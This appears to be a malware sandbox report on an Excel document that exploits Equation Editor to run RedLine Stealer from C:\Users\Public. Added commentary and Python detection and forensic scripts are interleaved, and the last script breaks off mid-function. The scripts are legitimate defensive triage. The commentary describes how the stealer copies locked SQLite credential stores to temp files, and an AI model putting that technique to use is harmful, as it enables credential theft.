2022-02-22 14:30:32 UTC 180 IN Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2022-02-22 14:30:32 UTC 184 IN Data Raw: ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff 42 42 42 ff 42 42 42 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff 42 42 42 ff 42 42 42 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 fff1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff 42 42 42 ff 42 42 42 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff 42 42 42 ff 42 42 42 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef Data Ascii: BBBBBBBBBBBBBBBBBBBBBBBB
• EXCEL.EXE
• EQNEDT32.EXE
• vbc.exe
• vbc.exe
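The four processes listed above form a single chain according to the "Analysis Process" lines in this section: EXCEL.EXE (PID 2580) and EQNEDT32.EXE (PID 2664) both have parent PID 596, EQNEDT32.EXE starts C:\Users\Public\vbc.exe (PID 1828), and that process starts a second copy of itself (PID 2844), the one in which most of the RedLine Yara hits are recorded. Two things matter for detection. First, the Equation Editor was started by COM activation (its command line carries -Embedding), so its recorded parent is the process that performed the activation (PID 596, the same parent as EXCEL.EXE, which was itself started with /automation -Embedding) and not EXCEL.EXE; a rule that requires EXCEL.EXE as the direct parent of EQNEDT32.EXE would miss this chain, whereas a rule on EQNEDT32.EXE as a parent of anything would catch it. Second, the payload runs from C:\Users\Public, a world-writable location, and re-launches its own image path. The script below is an added example, not part of this report or of Joe Sandbox: it rebuilds the process tree from the report's own lines (constructed here from the values on this page) and applies those three checks.

```python
import re
from collections import defaultdict

# Constructed from the "Analysis Process" and "Path" lines of this report.
REPORT_LINES = r"""
Analysis Process: EXCEL.EXE PID: 2580, Parent PID: 596
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Analysis Process: EQNEDT32.EXE PID: 2664, Parent PID: 596
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Analysis Process: vbc.exe PID: 1828, Parent PID: 2664
Path: C:\Users\Public\vbc.exe
Analysis Process: vbc.exe PID: 2844, Parent PID: 1828
Path: C:\Users\Public\vbc.exe
"""

PROC_RE = re.compile(r"^Analysis Process: (?P<image>\S+) PID: (?P<pid>\d+), Parent PID: (?P<ppid>\d+)$")
PATH_RE = re.compile(r"^Path: (?P<path>.+)$")

FINDING_EQNEDT = "spawned by Equation Editor (EQNEDT32.EXE)"
FINDING_PUBLIC = "image executed from C:\\Users\\Public"
FINDING_SELF = "child has the same image path as its parent"


def parse_processes(text: str) -> dict:
    """Map PID -> {image, ppid, path} from the report's process blocks."""
    procs, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        m = PROC_RE.match(line)
        if m:
            current = int(m["pid"])
            procs[current] = {"image": m["image"], "ppid": int(m["ppid"]), "path": None}
            continue
        m = PATH_RE.match(line)
        if m and current is not None:
            procs[current]["path"] = m["path"]
    return procs


def ancestry(procs: dict, pid: int) -> list:
    """PIDs from pid upward, stopping at the first parent the report does not describe."""
    chain = []
    while pid in procs:
        chain.append(pid)
        pid = procs[pid]["ppid"]
    return chain


def findings(procs: dict) -> list:
    """Apply the three checks to every process; returns (pid, finding) pairs."""
    out = []
    for pid, p in procs.items():
        parent = procs.get(p["ppid"])          # None when the parent is outside the report
        path = (p["path"] or "").lower()
        if parent and parent["image"].lower() == "eqnedt32.exe":
            out.append((pid, FINDING_EQNEDT))
        if path.startswith("c:\\users\\public\\"):
            out.append((pid, FINDING_PUBLIC))
        if parent and parent["path"] and parent["path"].lower() == path:
            out.append((pid, FINDING_SELF))
    return out


def render_tree(procs: dict) -> str:
    """Indented text tree; roots are processes whose parent the report does not list."""
    children = defaultdict(list)
    for pid, p in procs.items():
        children[p["ppid"]].append(pid)
    roots = sorted(pid for pid, p in procs.items() if p["ppid"] not in procs)
    lines = []

    def walk(pid, depth):
        p = procs[pid]
        lines.append(f"{'  ' * depth}{p['image']} (PID {pid}, PPID {p['ppid']}) {p['path']}")
        for child in sorted(children[pid]):
            walk(child, depth + 1)

    for root in roots:
        walk(root, 0)
    return "\n".join(lines)


if __name__ == "__main__":
    procs = parse_processes(REPORT_LINES)
    print(render_tree(procs))
    for pid, what in findings(procs):
        print(f"PID {pid}: {what}")
```

Because the report stops at PID 596, both EXCEL.EXE and EQNEDT32.EXE come out as roots of the rendered tree, and 2580 is not in the ancestry of the vbc.exe instances; that is exactly the gap an EXCEL.EXE-parent rule would fall into.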
Statistics
Behavior
System Behavior
Analysis Process: EXCEL.EXE PID: 2580, Parent PID: 596
General
Target ID: 0
Start time: 15:29:22
Start date: 22/02/2022
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase: 0x13f5c0000
File size: 28253536 bytes
MD5 hash: D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
File Activities
Registry Activities
Key Created
Key Path   Completion   Count   Source Address   Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems   success or wait   1   6DDF0648   unknown
Key Value Created
Key Path   Name   Type   Data   Completion   Count   Source Address   Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems   +3-   binary   2B 33 2D 00 14 0A 00 00 02 00 00 00 00 00 00 00 46 00 00 00 01 00 00 00 22 00 00 00 18 00 00 00 70 00 6F 00 61 00 74 00 32 00 30 00 37 00 36 00 34 00 35 00 32 00 2E 00 78 00 6C 00 73 00 78 00 00 00 70 00 6F 00 61 00 74 00 32 00 30 00 37 00 36 00 34 00 35 00 32 00 00 00   success or wait   1   6DDF0648   unknown
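The binary value Excel wrote under its Resiliency\StartupItems key is worth decoding during triage because it records the document that was open: the bytes above contain two length-prefixed, NUL-terminated UTF-16LE strings, "poat2076452.xlsx" (34 bytes, the 0x22 at offset 24) and "poat2076452" (24 bytes, the 0x18 at offset 28), and the dword right after the "+3-" marker is 0x0A14 = 2580, the PID of this EXCEL.EXE instance. The decoder below is an added example, not part of the report or of Joe Sandbox. The length-prefixed layout and the PID reading are inferred from this one sample and are labelled as assumptions in the code, not a documented Office format; the fallback carver of UTF-16LE runs does not depend on them and recovers the same two strings.

```python
import re
import struct

# Constructed from the report: the "+3-" value Excel wrote under
# HKCU\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems.
STARTUPITEMS_HEX = (
    "2B 33 2D 00 14 0A 00 00 02 00 00 00 00 00 00 00 46 00 00 00 01 00 00 00 "
    "22 00 00 00 18 00 00 00 70 00 6F 00 61 00 74 00 32 00 30 00 37 00 36 00 "
    "34 00 35 00 32 00 2E 00 78 00 6C 00 73 00 78 00 00 00 70 00 6F 00 61 00 "
    "74 00 32 00 30 00 37 00 36 00 34 00 35 00 32 00 00 00"
)


def hex_to_bytes(dump: str) -> bytes:
    """Turn a space-separated hex dump as printed in the report into bytes."""
    return bytes.fromhex(dump.replace(" ", ""))


def utf16_strings(blob: bytes, min_chars: int = 4) -> list:
    """Layout-independent fallback: carve runs of printable ASCII encoded as UTF-16LE."""
    pattern = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_chars)
    return [m.group().decode("utf-16-le") for m in pattern.finditer(blob)]


def parse_startup_item(blob: bytes) -> dict:
    """Decode the value using the layout inferred from this sample (an assumption):

    offset 0   b"+3-\\0" marker
    offset 4   five little-endian dwords; the first equals the Excel PID in this
               report (2580), the other four are not understood
    offset 24  byte length of the document name (UTF-16LE, terminator included)
    offset 28  byte length of the name without extension
    offset 32  the two strings, back to back
    """
    if not blob.startswith(b"+3-\x00"):
        raise ValueError("not a '+3-' StartupItems value")
    dwords = struct.unpack_from("<5I", blob, 4)
    len_name, len_stem = struct.unpack_from("<II", blob, 24)
    pos = 32
    name = blob[pos:pos + len_name].decode("utf-16-le").rstrip("\x00")
    pos += len_name
    stem = blob[pos:pos + len_stem].decode("utf-16-le").rstrip("\x00")
    pos += len_stem
    if pos != len(blob):
        raise ValueError(f"{len(blob) - pos} trailing bytes do not fit the assumed layout")
    return {
        "pid": dwords[0],              # assumption: owning process id
        "unknown_dwords": dwords[1:],
        "document": name,
        "stem": stem,
    }


if __name__ == "__main__":
    blob = hex_to_bytes(STARTUPITEMS_HEX)
    print(parse_startup_item(blob))
    print(utf16_strings(blob))
```

If parse_startup_item raises on a value from another machine, the layout assumption did not hold for that sample; utf16_strings still gives the file names, which is usually what the investigation needs.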
Analysis Process: EQNEDT32.EXE PID: 2664, Parent PID: 596
General
Target ID: 2
Start time: 15:29:47
Start date: 22/02/2022
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit): true
Commandline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase: 0x400000
File size: 543304 bytes
MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
File Activities
Registry Activities
Key Created
Key Path   Completion   Count   Source Address   Symbol
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor   success or wait   1   41369F   RegCreateKeyExA
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0   success or wait   1   41369F   RegCreateKeyExA
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options   success or wait   1   41369F   RegCreateKeyExA
Analysis Process: vbc.exe PID: 1828, Parent PID: 2664
General
Target ID: 4
Start time: 15:29:50
Start date: 22/02/2022
Path: C:\Users\Public\vbc.exe
Wow64 process (32bit): true
Commandline: "C:\Users\Public\vbc.exe"
Imagebase: 0xf00000
File size: 14336 bytes
MD5 hash: 980EC4304344F277D722024ADE08CD01
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.501429999.0000000003319000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.501429999.0000000003319000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.501468548.0000000003339000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.501468548.0000000003339000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.501539068.0000000003387000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.501539068.0000000003387000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches: Detection: 7%, ReversingLabs
Reputation: low
File Activities
File Read
File Path   Offset   Length   Completion   Count   Source Address   Symbol
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config   unknown   4095   success or wait   1   6D517995   unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config   unknown   6135   success or wait   1   6D517995   unknown
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll.aux   unknown   176   success or wait   1   6D42DE2C   ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config   unknown   4095   success or wait   1   6D51A1A4   ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\fb06ad4bc55b9c3ca68a3f9259d826cd\System.Windows.Forms.ni.dll.aux   unknown   1720   success or wait   1   6D42DE2C   ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\1be7a15b1f33bf22e4f53aaf45518c77\System.ni.dll.aux   unknown   620   success or wait   1   6D42DE2C   ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\1d52bd4ac5e0a6422058a5d62c9f6d9d\System.Drawing.ni.dll.aux   unknown   584   success or wait   1   6D42DE2C   ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\fe4b221b4109f0c78f57a792500699b5\System.Configuration.ni.dll.aux   unknown   864   success or wait   1   6D42DE2C   ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\eb4cca4f06a15158c3f7e2c56516729b\System.Core.ni.dll.aux   unknown   900   success or wait   1   6D42DE2C   ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\4fbda26d781323081b45526da6e87b35\System.Xml.ni.dll.aux   unknown   748   success or wait   1   6D42DE2C   ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config   unknown   4096   success or wait   1   6C51B2B3   ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config   unknown   4096   end of file   1   6C51B2B3   ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\4fc035341c55c61ce51e53d179d1e19d\Microsoft.VisualBasic.ni.dll.aux   unknown   1708   success or wait   1   6D42DE2C   ReadFile
Registry Activities
Key Created
Key Path   Completion   Count   Source Address   Symbol
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Tracing\vbc_RASAPI32   success or wait   1   6B92AD76   unknown
Key Value Created
Key Path   Name   Type   Data   Completion   Count   Source Address   Symbol
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\vbc_RASAPI32   EnableFileTracing   dword   0   success or wait   1   6B92AD76   unknown
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\vbc_RASAPI32   EnableConsoleTracing   dword   0   success or wait   1   6B92AD76   unknown
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\vbc_RASAPI32   FileTracingMask   dword   -65536   success or wait   1   6B92AD76   unknown
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\vbc_RASAPI32   ConsoleTracingMask   dword   -65536   success or wait   1   6B92AD76   unknown
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\vbc_RASAPI32   MaxFileSize   dword   1048576   success or wait   1   6B92AD76   unknown
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\vbc_RASAPI32   FileDirectory   expand unicode   %windir%\tracing   success or wait   1   6B92AD76   unknown
Analysis Process: vbc.exe PID: 2844, Parent PID: 1828
General
Target ID: 5
Start time: 15:29:57
Start date: 22/02/2022
Path: C:\Users\Public\vbc.exe
Wow64 process (32bit): true
Commandline: C:\Users\Public\vbc.exe
Imagebase: 0xf00000
File size: 14336 bytes
MD5 hash: 980EC4304344F277D722024ADE08CD01
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000000.496802166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.496802166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.546999883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.546999883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000000.497707584.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.497707584.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000000.497086691.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.497086691.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.547529132.0000000002357000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000000.497411507.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.497411507.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
File Activities
File Created
File Path   Access   Attributes   Options   Completion   Count   Source Address   Symbol
C:\Users\user\AppData\Local\Temp\tmp6222.tmp   read attributes | synchronize | generic read   device | sparse file   synchronous io non alert | non directory file   success or wait   1   6C517C90   GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp62EE.tmp   read attributes | synchronize | generic read   device | sparse file   synchronous io non alert | non directory file   success or wait   1   6C517C90   GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp6417.tmp   read attributes | synchronize | generic read   device | sparse file   synchronous io non alert | non directory file   success or wait   1   6C517C90   GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp64E3.tmp   read attributes | synchronize | generic read   device | sparse file   synchronous io non alert | non directory file   success or wait   1   6C517C90   GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp66A8.tmp   read attributes | synchronize | generic read   device | sparse file   synchronous io non alert | non directory file   success or wait   1   6C517C90   GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp67A3.tmp   read attributes | synchronize | generic read   device | sparse file   synchronous io non alert | non directory file   success or wait   1   6C517C90   GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp6AC0.tmp   read attributes | synchronize | generic read   device | sparse file   synchronous io non alert | non directory file   success or wait   1   6C517C90   GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp6C85.tmp   read attributes | synchronize | generic read   device | sparse file   synchronous io non alert | non directory file   success or wait   1   6C517C90   GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp7108.tmp   read attributes | synchronize | generic read   device | sparse file   synchronous io non alert | non directory file   success or wait   1   6C517C90   GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp71C5.tmp   read attributes | synchronize | generic read   device | sparse file   synchronous io non alert | non directory file   success or wait   1   6C517C90   GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp72BF.tmp   read attributes | synchronize | generic read   device | sparse file   synchronous io non alert | non directory file   success or wait   1   6C517C90   GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp738B.tmp   read attributes | synchronize | generic read   device | sparse file   synchronous io non alert | non directory file   success or wait   1   6C517C90   GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp7486.tmp   read attributes | synchronize | generic read   device | sparse file   synchronous io non alert | non directory file   success or wait   1   6C517C90   GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp7551.tmp   read attributes | synchronize | generic read   device | sparse file   synchronous io non alert | non directory file   success or wait   1   6C517C90   GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp764C.tmp   read attributes | synchronize | generic read   device | sparse file   synchronous io non alert | non directory file   success or wait   1   6C517C90   GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp7718.tmp   read attributes | synchronize | generic read   device | sparse file   synchronous io non alert | non directory file   success or wait   1   6C517C90   GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp7841.tmp   read attributes | synchronize | generic read   device | sparse file   synchronous io non alert | non directory file   success or wait   1   6C517C90   GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp790D.tmp   read attributes | synchronize | generic read   device | sparse file   synchronous io non alert | non directory file   success or wait   1   6C517C90   GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp79D9.tmp   read attributes | synchronize | generic read   device | sparse file   synchronous io non alert | non directory file   success or wait   1   6C517C90   GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp7AA5.tmp   read attributes | synchronize | generic read   device | sparse file   synchronous io non alert | non directory file   success or wait   1   6C517C90   GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp7BCE.tmp   read attributes | synchronize | generic read   device | sparse file   synchronous io non alert | non directory file   success or wait   1   6C517C90   GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp7CF7.tmp   read attributes | synchronize | generic read   device | sparse file   synchronous io non alert | non directory file   success or wait   1   6C517C90   GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp533A.tmp   read attributes | synchronize | generic read   device | sparse file   synchronous io non alert | non directory file   success or wait   1   6C517C90   GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp3E26.tmp   read attributes | synchronize | generic read   device | sparse file   synchronous io non alert | non directory file   success or wait   1   6C517C90   GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp3EE2.tmp   read attributes | synchronize | generic read   device | sparse file   synchronous io non alert | non directory file   success or wait   1   6C517C90   GetTempFileNameW
C:\Users\user\AppData\Local\Temp\tmp3FAE.tmp   read attributes | synchronize | generic read   device | sparse file   synchronous io non alert | non directory file   success or wait   1   6C517C90   GetTempFileNameW
C:\Users\user\AppData\Local\Yandex   read data or list directory | synchronize   device | sparse file   directory file | synchronous io non alert | open for backup ident | open reparse point   success or wait   1   6C514247   CreateDirectoryW
C:\Users\user\AppData\Local\Yandex\YaAddon   read data or list directory | synchronize   device | sparse file   directory file | synchronous io non alert | open for backup ident | open reparse point   success or wait   1   6C514247   CreateDirectoryW
File Deleted
File Path   Completion   Count   Source Address   Symbol
C:\Users\user\AppData\Local\Temp\tmp62EE.tmp   success or wait   1   6C517D79   DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp6222.tmp   success or wait   1   6C517D79   DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp64E3.tmp   success or wait   1   6C517D79   DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp6417.tmp   success or wait   1   6C517D79   DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp67A3.tmp   success or wait   1   6C517D79   DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp66A8.tmp   success or wait   1   6C517D79   DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp6C85.tmp   success or wait   1   6C517D79   DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp6AC0.tmp   success or wait   1   6C517D79   DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp71C5.tmp   success or wait   1   6C517D79   DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp7108.tmp   success or wait   1   6C517D79   DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp738B.tmp   success or wait   1   6C517D79   DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp72BF.tmp   success or wait   1   6C517D79   DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp7551.tmp   success or wait   1   6C517D79   DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp7486.tmp   success or wait   1   6C517D79   DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp7718.tmp   success or wait   1   6C517D79   DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp764C.tmp   success or wait   1   6C517D79   DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp790D.tmp   success or wait   1   6C517D79   DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp7841.tmp   success or wait   1   6C517D79   DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp7AA5.tmp   success or wait   1   6C517D79   DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp79D9.tmp   success or wait   1   6C517D79   DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp7CF7.tmp   success or wait   1   6C517D79   DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp7BCE.tmp   success or wait   1   6C517D79   DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp533A.tmp   success or wait   1   6C517D79   DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp3E26.tmp   success or wait   1   6C517D79   DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp3EE2.tmp   success or wait   1   6C517D79   DeleteFileW
C:\Users\user\AppData\Local\Temp\tmp3FAE.tmp   success or wait   1   6C517D79   DeleteFileW
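The temp files that vbc.exe (PID 2844) creates with GetTempFileNameW and deletes again with DeleteFileW are, according to the File Written rows that follow, each filled by one CopyFileW call, and the logged data starts with "SQLite format 3", the SQLite 3 file header. The header also states the page size (bytes 16 to 17, big-endian) and the page count (bytes 28 to 31), and their product equals the Length column of the write: 2048 x 20 = 40960 for the first six files and 4096 x 7 = 28672 for the next two, so each temp file is a complete copy of a SQLite database rather than a partial read. Copying SQLite-backed stores to temp files, reading them and deleting the copies is how credential stealers typically get around locks on browser profile databases; the report does not show which databases were copied, so that reading is an inference rather than a fact on this page. The parser below is an added example and is not code from the report or from Joe Sandbox: it decodes the header fields from the first 60 bytes of a logged write (the sample rows are constructed from the hex on this page) and flags a write as a complete SQLite copy when the computed size matches the logged length. The in-header page count is only authoritative when the version-valid-for field at offset 92 equals the change counter; the parser checks that when 96 or more bytes are available and reports None otherwise, which is the case for the 60-byte excerpts used here.

```python
import struct

SQLITE_MAGIC = b"SQLite format 3\x00"
TEXT_ENCODINGS = {1: "UTF-8", 2: "UTF-16le", 3: "UTF-16be"}

# Constructed from this report's File Written rows: (path, logged Length,
# first 60 bytes of the Value column at offset 0). The third row is a
# constructed non-SQLite write (a PE "MZ" header) to exercise the negative path.
SAMPLE_WRITES = [
    ("C:\\Users\\user\\AppData\\Local\\Temp\\tmp6222.tmp", 40960,
     "53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 "
     "00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 15 00 00 00 04 "
     "00 00 00 00 00 00 00 00 00 00 00 01"),
    ("C:\\Users\\user\\AppData\\Local\\Temp\\tmp6AC0.tmp", 28672,
     "53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 10 00 01 01 00 40 20 20 "
     "00 00 00 09 00 00 00 07 00 00 00 07 00 00 00 02 00 00 00 0d 00 00 00 04 "
     "00 00 00 00 00 00 00 00 00 00 00 01"),
    ("<constructed non-SQLite write>", 512, "4d 5a 90 00 03 00 00 00"),
]


def parse_sqlite_header(data: bytes) -> dict:
    """Decode the SQLite 3 header fields this check needs (offsets per the SQLite file format, big-endian)."""
    if len(data) < 60 or not data.startswith(SQLITE_MAGIC):
        raise ValueError("not a SQLite 3 database header")
    raw_page_size = struct.unpack_from(">H", data, 16)[0]
    page_size = 65536 if raw_page_size == 1 else raw_page_size   # 1 encodes 65536
    if page_size < 512 or page_size > 65536 or page_size & (page_size - 1):
        raise ValueError(f"invalid page size {raw_page_size}")
    (change_counter, page_count, _freelist_trunk, freelist_count,
     schema_cookie, schema_format, _cache_size, _largest_root,
     encoding) = struct.unpack_from(">9I", data, 24)
    size_is_trusted = None
    if len(data) >= 96:
        # The in-header page count is valid only if this field equals the change counter.
        size_is_trusted = struct.unpack_from(">I", data, 92)[0] == change_counter
    return {
        "page_size": page_size,
        "write_version": data[18],
        "read_version": data[19],
        "change_counter": change_counter,
        "page_count": page_count,
        "freelist_pages": freelist_count,
        "schema_cookie": schema_cookie,
        "schema_format": schema_format,
        "text_encoding": TEXT_ENCODINGS.get(encoding, f"unknown({encoding})"),
        "size_is_trusted": size_is_trusted,
        "expected_size": page_size * page_count,
    }


def check_write(path: str, logged_length: int, hexdump: str) -> dict:
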